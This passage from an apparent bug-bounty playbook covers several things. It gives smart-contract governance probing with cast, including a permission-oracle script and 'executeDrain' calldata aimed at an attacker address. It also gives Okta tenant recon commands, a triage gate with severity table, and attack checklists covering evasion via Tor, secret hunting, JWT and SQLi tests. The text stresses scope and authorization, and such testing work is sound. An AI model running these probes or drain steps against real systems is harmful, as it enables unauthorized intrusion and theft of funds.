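    """Map cast output to ('blocked', reason) | ('allowed', value) | ('error', text)."""
    text = output.strip()
    lowered = text.lower()
    if "revert" in lowered:
        reason = text.split("reverted:", 1)[1].strip() if "reverted:" in text else ""
        return ("blocked", reason.splitlines()[0] if reason else "(no reason string)")
    if lowered.startswith("error"):
        return ("error", text.splitlines()[0])
    return ("allowed", text.splitlines()[-1] if text else "")


def audit_admin_functions(run, contract, sender, rpc, calls=ADMIN_CALLS):
    """{signature: (verdict, detail)}; an 'allowed' admin function is the CRITICAL finding."""
    report = {}
    for sig, params in calls:
        report[sig] = classify(simulate(run, contract, sig, params, sender, rpc))
    return report


def proposal_state(run, contract, proposal_id, rpc):
    """Readable Governor state for one proposal id (OZ ids are hashes, not counters)."""
    out = run(["call", contract, "state(uint256)(uint8)", str(proposal_id),
               "--rpc-url", rpc]).strip()
    if out.isdigit() and int(out) in range(len(PROPOSAL_STATES)):
        return PROPOSAL_STATES[int(out)]
    return "Unknown"


if __name__ == "__main__":
    import sys
    contract, attacker, rpc = sys.argv[1:4]  # usage: oracle.py CONTRACT ATTACKER RPC_URL
    for sig, (verdict, detail) in audit_admin_functions(run_cast, contract, attacker, rpc).items():
        print(f"{verdict:8} {sig}  {detail}")
```

&lt;p&gt;Only after a simulated call comes back &lt;code&gt;allowed&lt;/code&gt;, and only inside the agreed scope, is a real &lt;code&gt;cast send&lt;/code&gt; worth considering: on an unprotected function it performs the admin action for real.&lt;/p&gt;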
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Gas estimation as a permission oracle&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If cast estimate returns a gas cost → the operation would succeed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If it returns a revert reason → blocked (but reveals internal logic)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cast estimate TARGET_CONTRACT &lt;span style="color:#a6d189"&gt;&amp;#34;setQuorumBps(uint256)&amp;#34;&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;0&lt;/span&gt; --rpc-url &lt;span style="color:#f2d5cf"&gt;$RPC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Scan governance parameters&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cast call TARGET_CONTRACT &lt;span style="color:#a6d189"&gt;&amp;#34;quorumBps()(uint256)&amp;#34;&lt;/span&gt; --rpc-url &lt;span style="color:#f2d5cf"&gt;$RPC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cast call TARGET_CONTRACT &lt;span style="color:#a6d189"&gt;&amp;#34;votingPeriod()(uint256)&amp;#34;&lt;/span&gt; --rpc-url &lt;span style="color:#f2d5cf"&gt;$RPC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cast call TARGET_CONTRACT &lt;span style="color:#a6d189"&gt;&amp;#34;entryFee()(uint256)&amp;#34;&lt;/span&gt; --rpc-url &lt;span style="color:#f2d5cf"&gt;$RPC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If quorumBps=0 → any proposal passes without votes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If entryFee=0 → anyone can participate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Test admin functions as an unauthorized address. Simulate first: cast send broadcasts a real transaction&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;#    and, if the function is unprotected, actually performs the admin action (rules of engagement!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cast call TARGET_CONTRACT &lt;span style="color:#a6d189"&gt;&amp;#34;addCouncilMember(address)&amp;#34;&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;$ATTACKER&lt;/span&gt; \
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; --from &lt;span style="color:#f2d5cf"&gt;$ATTACKER&lt;/span&gt; --rpc-url &lt;span style="color:#f2d5cf"&gt;$RPC&lt;/span&gt; 2&amp;gt;&amp;amp;1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If revert &amp;#34;Ownable: caller is not the owner&amp;#34; → safe&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If it returns normally → CRITICAL; prove it with cast send --private-key $KEY only with explicit authorization&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Enumerate unexecuted proposals. Sequential ids only work if the governor numbers proposals; OpenZeppelin Governor ids are hashes, so collect them from ProposalCreated events with cast logs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; id in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;seq &lt;span style="color:#ef9f76"&gt;1&lt;/span&gt; 50&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;state&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;cast call TARGET_CONTRACT &lt;span style="color:#a6d189"&gt;&amp;#34;state(uint256)(uint8)&amp;#34;&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;$id&lt;/span&gt; --rpc-url &lt;span style="color:#f2d5cf"&gt;$RPC&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$state&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;4&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Proposal #&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$id&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: Succeeded (executable!)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. Drain chain via malicious proposal&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cast calldata &lt;span style="color:#a6d189"&gt;&amp;#34;executeDrain(address,uint256)&amp;#34;&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;$ATTACKER&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;1000000000000000000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If propose() accepts this calldata → can drain the treasury&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2628-okta-specific-recon" &gt;
&lt;div&gt;
&lt;a href="#2628-okta-specific-recon"&gt;
##
&lt;/a&gt;
26.28 Okta-Specific Recon
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. grant_type=none detection (OAuth metadata)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.okta.com/oauth2/default/.well-known/oauth-authorization-server&amp;#34;&lt;/span&gt; | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jq &lt;span style="color:#a6d189"&gt;&amp;#39;.token_endpoint_auth_methods_supported&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If [&amp;#34;none&amp;#34;] is in the list → public clients can obtain tokens without a secret&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. CSP localhost port mapping (Okta FastPass)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.okta.com/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;content-security-policy&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# connect-src http://localhost:8769 http://127.0.0.1:65111&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Reveals the ports of the Okta FastPass local authenticator&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Attack: if malware runs on localhost, it can communicate with these ports&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. OpenID Configuration discovery&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.okta.com/.well-known/openid-configuration&amp;#34;&lt;/span&gt; | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jq &lt;span style="color:#a6d189"&gt;&amp;#39;{issuer, auth_endpoint: .authorization_endpoint, token_endpoint: .token_endpoint, grants: .grant_types_supported}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Tenant discovery (find the target&amp;#39;s Okta domain)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check redirect headers in SSO, DNS TXT records, JS bundles&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dig TXT _okta.TARGET.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://sso.TARGET.com&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;location\|okta&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
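&lt;p&gt;The two curl-and-jq checks in 26.28 (the &lt;code&gt;none&lt;/code&gt; token-endpoint auth method and the loopback ports in &lt;code&gt;connect-src&lt;/code&gt;) are simple enough to turn into a repeatable audit script for a tenant you administer. The Python below is an added example written for this playbook, not the author's code; &lt;code&gt;SAMPLE_METADATA&lt;/code&gt; and &lt;code&gt;SAMPLE_CSP&lt;/code&gt; are constructed stand-ins for what curl would fetch, and the implicit-grant check is an added generalisation of the same metadata review, not something the recon block itself performs.&lt;/p&gt;

```python
"""Offline audit of the two artifacts the Okta recon block inspects:
the OAuth authorization-server metadata document and the connect-src
directive of a Content-Security-Policy header.  Added example for this
playbook, not the author's code; SAMPLE_METADATA and SAMPLE_CSP are
constructed stand-ins for what curl would fetch from a tenant."""
import json
import re

# Constructed sample metadata document (shape follows RFC 8414 / OIDC discovery).
SAMPLE_METADATA = json.dumps({
    "issuer": "https://example-tenant.okta.com/oauth2/default",
    "authorization_endpoint": "https://example-tenant.okta.com/oauth2/default/v1/authorize",
    "token_endpoint": "https://example-tenant.okta.com/oauth2/default/v1/token",
    "grant_types_supported": ["authorization_code", "implicit", "refresh_token"],
    "token_endpoint_auth_methods_supported": ["client_secret_basic", "client_secret_post", "none"],
})

# Constructed sample CSP header value with two loopback entries in connect-src.
SAMPLE_CSP = (
    "default-src 'self'; "
    "connect-src 'self' https://api.example-tenant.okta.com "
    "http://localhost:8769 http://127.0.0.1:65111; "
    "img-src * data:"
)

# Loopback origins: localhost, 127.0.0.1 or [::1], with an optional port.
LOOPBACK = re.compile(r"^https?://(localhost|127\.0\.0\.1|\[::1\])(:\d+)?$", re.IGNORECASE)


def audit_oauth_metadata(raw):
    """Return a list of (severity, message) findings for one metadata document.

    The 'none' check is the one from the recon block; the implicit-grant check
    is an added generalisation of the same review (assumption: the reviewer
    also wants legacy grants flagged)."""
    doc = json.loads(raw)
    findings = []
    methods = doc.get("token_endpoint_auth_methods_supported", [])
    if "none" in methods:
        findings.append(("info", "token endpoint lists auth method 'none': public clients "
                                 "get tokens without a client secret; verify PKCE is required"))
    if "implicit" in doc.get("grant_types_supported", []):
        findings.append(("low", "implicit grant enabled: access tokens are returned in the "
                                "URL fragment"))
    return findings


def loopback_connect_src(csp_header):
    """Return the loopback origins that connect-src allows, sorted, or [] if none."""
    for directive in csp_header.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "connect-src":
            return sorted(src for src in parts[1:] if LOOPBACK.match(src))
    return []


def report(raw_metadata, csp_header):
    """Combine both checks into one summary dict, ready to paste into triage notes."""
    return {
        "oauth_findings": audit_oauth_metadata(raw_metadata),
        "loopback_connect_src": loopback_connect_src(csp_header),
    }


if __name__ == "__main__":
    print(json.dumps(report(SAMPLE_METADATA, SAMPLE_CSP), indent=2))
```

&lt;p&gt;Feed it the body of &lt;code&gt;.well-known/oauth-authorization-server&lt;/code&gt; and the raw &lt;code&gt;Content-Security-Policy&lt;/code&gt; header value; a non-empty &lt;code&gt;loopback_connect_src&lt;/code&gt; list is the FastPass port disclosure the recon block describes, and a &lt;code&gt;none&lt;/code&gt; finding is only a problem if the public clients behind it are not forced through PKCE.&lt;/p&gt;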
&lt;h2 id="27-report--triage-methodology" &gt;
&lt;div&gt;
&lt;a href="#27-report--triage-methodology"&gt;
#
&lt;/a&gt;
27. REPORT &amp;amp; TRIAGE METHODOLOGY
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="271-7-question-gate-before-reporting" &gt;
&lt;div&gt;
&lt;a href="#271-7-question-gate-before-reporting"&gt;
##
&lt;/a&gt;
27.1 7-Question Gate (Before Reporting)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Before writing ANY report, answer these 7 questions:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Question&lt;/th&gt;
&lt;th&gt;If &amp;ldquo;no&amp;rdquo;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Q1&lt;/td&gt;
&lt;td&gt;Can you reproduce with a real request, right now?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;KILL&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Q2&lt;/td&gt;
&lt;td&gt;Is the impact on the program&amp;rsquo;s accepted list?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;KILL&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Q3&lt;/td&gt;
&lt;td&gt;Is the target in-scope?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;KILL&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Q4&lt;/td&gt;
&lt;td&gt;Does it work without privilege the attacker doesn&amp;rsquo;t have?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;KILL&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Q5&lt;/td&gt;
&lt;td&gt;Is it not a known/by-design behavior?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;KILL&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Q6&lt;/td&gt;
&lt;td&gt;Can you prove REAL impact (data), not just &amp;ldquo;technically possible&amp;rdquo;?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;DOWNGRADE&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Q7&lt;/td&gt;
&lt;td&gt;Is it not on the never-submit list?&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;KILL&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="272-severity-simplified-cvss-31" &gt;
&lt;div&gt;
&lt;a href="#272-severity-simplified-cvss-31"&gt;
##
&lt;/a&gt;
27.2 Severity (Simplified CVSS 3.1)
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Severity&lt;/th&gt;
&lt;th&gt;CVSS&lt;/th&gt;
&lt;th&gt;Examples&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Critical&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;9.0-10.0&lt;/td&gt;
&lt;td&gt;RCE, SQLi with dump, CRUD without auth on sensitive data, Public Firebase with PII&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;High&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;7.0-8.9&lt;/td&gt;
&lt;td&gt;Auth bypass, JWT forgery, DELETE without auth, Stored XSS, CORS+creds, DMARC p=none&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Medium&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;4.0-6.9&lt;/td&gt;
&lt;td&gt;CORS reflection without creds, info disclosure (emails, versions), reflected XSS, source maps&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Low&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;0.1-3.9&lt;/td&gt;
&lt;td&gt;Missing headers, server version disclosure, path disclosure, missing rate limiting&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="273-title-formula" &gt;
&lt;div&gt;
&lt;a href="#273-title-formula"&gt;
##
&lt;/a&gt;
27.3 Title Formula
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[Vulnerability Type] in [Component] allows [Impact] at [Target]
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Examples:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&amp;ldquo;Broken Access Control in Cloud Functions allows Mass Data Deletion at admin-17e4f&amp;rdquo;&lt;/li&gt;
&lt;li&gt;&amp;ldquo;Public Firestore Database exposes 204K WhatsApp Conversations at {project}&amp;rdquo;&lt;/li&gt;
&lt;li&gt;&amp;ldquo;JWT Secret Hardcoded in JS Bundle allows Token Forgery at app.target.com&amp;rdquo;&lt;/li&gt;
&lt;/ul&gt;
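&lt;p&gt;Sections 27.1 to 27.3 describe one triage step: run the gate, band the score, build the title. The Python below encodes that step so a finding can be checked mechanically before anyone starts writing. It is an added example, not part of the original playbook; the &lt;code&gt;Finding&lt;/code&gt; class, its field names and the sample finding are assumptions made for the demonstration, and the rule that a downgrade never drops below Low is a choice made here, not stated on the page.&lt;/p&gt;

```python
"""The 7-Question Gate, the simplified CVSS 3.1 bands and the title formula
from sections 27.1-27.3, encoded as one triage step.  Added example, not
part of the original playbook; the Finding class, its field names and the
sample finding below are assumptions made for the demonstration."""
import bisect
from dataclasses import dataclass, field

# Gate questions exactly as in the table; a "no" on Q6 downgrades, any other "no" kills.
GATE = [
    ("Q1", "Can you reproduce with a real request, right now?", "KILL"),
    ("Q2", "Is the impact on the program's accepted list?", "KILL"),
    ("Q3", "Is the target in-scope?", "KILL"),
    ("Q4", "Does it work without privilege the attacker doesn't have?", "KILL"),
    ("Q5", "Is it not a known/by-design behavior?", "KILL"),
    ("Q6", "Can you prove REAL impact (data), not just 'technically possible'?", "DOWNGRADE"),
    ("Q7", "Is it not on the never-submit list?", "KILL"),
]

# Band floors from 27.2, ascending; LABELS[i] applies to scores at or above FLOORS[i-1].
FLOORS = [0.1, 4.0, 7.0, 9.0]
LABELS = ["None", "Low", "Medium", "High", "Critical"]

# Title formula from 27.3.
TITLE = "{vuln_type} in {component} allows {impact} at {target}"


@dataclass
class Finding:
    vuln_type: str
    component: str
    impact: str
    target: str
    cvss: float
    answers: dict = field(default_factory=dict)   # question id mapped to True ("yes") or False


def severity(score):
    """Map a CVSS 3.1 base score onto the playbook's four bands."""
    return LABELS[bisect.bisect_right(FLOORS, score)]


def downgrade(label):
    """Drop one band, but never below Low: a finding with a 'no' on Q6 still ships (assumption)."""
    if label == "None":
        return label
    return LABELS[max(LABELS.index(label) - 1, 1)]


def triage(finding):
    """Run the gate top to bottom.

    Returns (verdict, severity_label, title).  verdict is KILL, DOWNGRADE or PASS;
    title is None when the finding is killed, because nothing gets written."""
    verdict = "PASS"
    label = severity(finding.cvss)
    for qid, _question, action in GATE:
        if finding.answers.get(qid, False):
            continue                                # "yes": this gate is passed
        if action == "KILL":
            return "KILL", label, None              # first kill ends the review
        verdict = "DOWNGRADE"
        label = downgrade(label)
    return verdict, label, TITLE.format(**vars(finding))


# Constructed sample: the finding reproduces and is in scope, but only the ability
# to delete, not actual data loss, was demonstrated, so Q6 is answered "no".
SAMPLE = Finding(
    vuln_type="Broken Access Control",
    component="Cloud Functions",
    impact="Mass Data Deletion",
    target="example-project",
    cvss=9.1,
    answers={"Q1": True, "Q2": True, "Q3": True, "Q4": True,
             "Q5": True, "Q6": False, "Q7": True},
)

if __name__ == "__main__":
    print(triage(SAMPLE))
```

&lt;p&gt;Any unanswered question counts as &amp;ldquo;no&amp;rdquo;, which is the safe default: a finding nobody has checked against scope or the accepted-impact list is killed rather than submitted. The sample finding lands at &lt;code&gt;DOWNGRADE&lt;/code&gt; / &lt;code&gt;High&lt;/code&gt; because a 9.1 score with no proven data impact drops one band before the title is built.&lt;/p&gt;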
&lt;h3 id="274-report-structure" &gt;
&lt;div&gt;
&lt;a href="#274-report-structure"&gt;
##
&lt;/a&gt;
27.4 Report Structure
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;1. Summary (1-2 impact sentences)
2. Steps to Reproduce (curl commands, exact requests, responses)
3. Proof of Concept (screenshots, evidence)
4. Impact (real data affected, number of users, business risk)
5. Remediation (concrete fix suggestion)
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="28-final-checklist" &gt;
&lt;div&gt;
&lt;a href="#28-final-checklist"&gt;
#
&lt;/a&gt;
28. FINAL CHECKLIST
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="pre-engagement" &gt;
&lt;div&gt;
&lt;a href="#pre-engagement"&gt;
##
&lt;/a&gt;
Pre-Engagement
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[ ] Define scope (IPs, domains, ranges, exclusions)
[ ] Configure VPN/Tor/proxy
[ ] Check that your IP is not leaking (ipleak.net)
[ ] Rotate User-Agent and configure random delays
[ ] Subdomain, common password, and path wordlists
[ ] Automation scripts ready
[ ] GitHub token configured (if doing code search)
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="recon--phase-1-passive" &gt;
&lt;div&gt;
&lt;a href="#recon--phase-1-passive"&gt;
##
&lt;/a&gt;
Recon — Phase 1 (Passive)
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[ ] crt.sh → subdomains
[ ] Google dorks → secrets, .env, credentials
[ ] Shodan → infrastructure
[ ] DNS (A, AAAA, MX, NS, TXT, CNAME, SOA)
[ ] DMARC, SPF, DKIM
[ ] GitHub code search → leaks
[ ] Wayback Machine → historical URLs
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="recon--phase-2-active" &gt;
&lt;div&gt;
&lt;a href="#recon--phase-2-active"&gt;
##
&lt;/a&gt;
Recon — Phase 2 (Active)
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[ ] Port scan (RustScan/Masscan) → open ports
[ ] .env + .git + Dockerfile + storage/ on all endpoints
[ ] JS bundles → API keys, JWTs, Firebase configs
[ ] Source maps → source code
[ ] CORS → origin reflection test
[ ] Cache headers → WCD/WCP candidates
[ ] Virtual host enumeration
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="hunt--phase-3" &gt;
&lt;div&gt;
&lt;a href="#hunt--phase-3"&gt;
##
&lt;/a&gt;
Hunt — Phase 3
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[ ] WordPress: REST API, XML-RPC, wp-login, plugins
[ ] Laravel: .env, logs, Telescope, Horizon, debug
[ ] Spring Boot: actuators, swagger, H2 console
[ ] Firebase: signUp, Firestore, Storage, RTDB
[ ] Supabase: anon key, RLS bypass, storage
[ ] Cloud Functions: GET/POST/DELETE without auth
[ ] S3/MinIO: public listing, upload
[ ] APIs: auth bypass, IDOR, mass assignment
[ ] JWT: decode, alg=none, weak secret, key confusion
[ ] WCD/WCP: cache deception, cache poisoning
[ ] SQLi: time-based blind on all logins
[ ] SSRF: cloud metadata, internal endpoints
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="report--phase-4" &gt;
&lt;div&gt;
&lt;a href="#report--phase-4"&gt;
##
&lt;/a&gt;
Report — Phase 4
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[ ] 7-Question Gate → PASS on all
[ ] Screenshots and evidence captured
[ ] PII redacted in screenshots
[ ] Reproducible PoC (exact command)
[ ] Real impact documented (number of records, data type)
[ ] Fix recommendation included
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="29-essential-tools" &gt;
&lt;div&gt;
&lt;a href="#29-essential-tools"&gt;
#
&lt;/a&gt;
29. ESSENTIAL TOOLS
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="recon--subdomains" &gt;
&lt;div&gt;
&lt;a href="#recon--subdomains"&gt;
##
&lt;/a&gt;
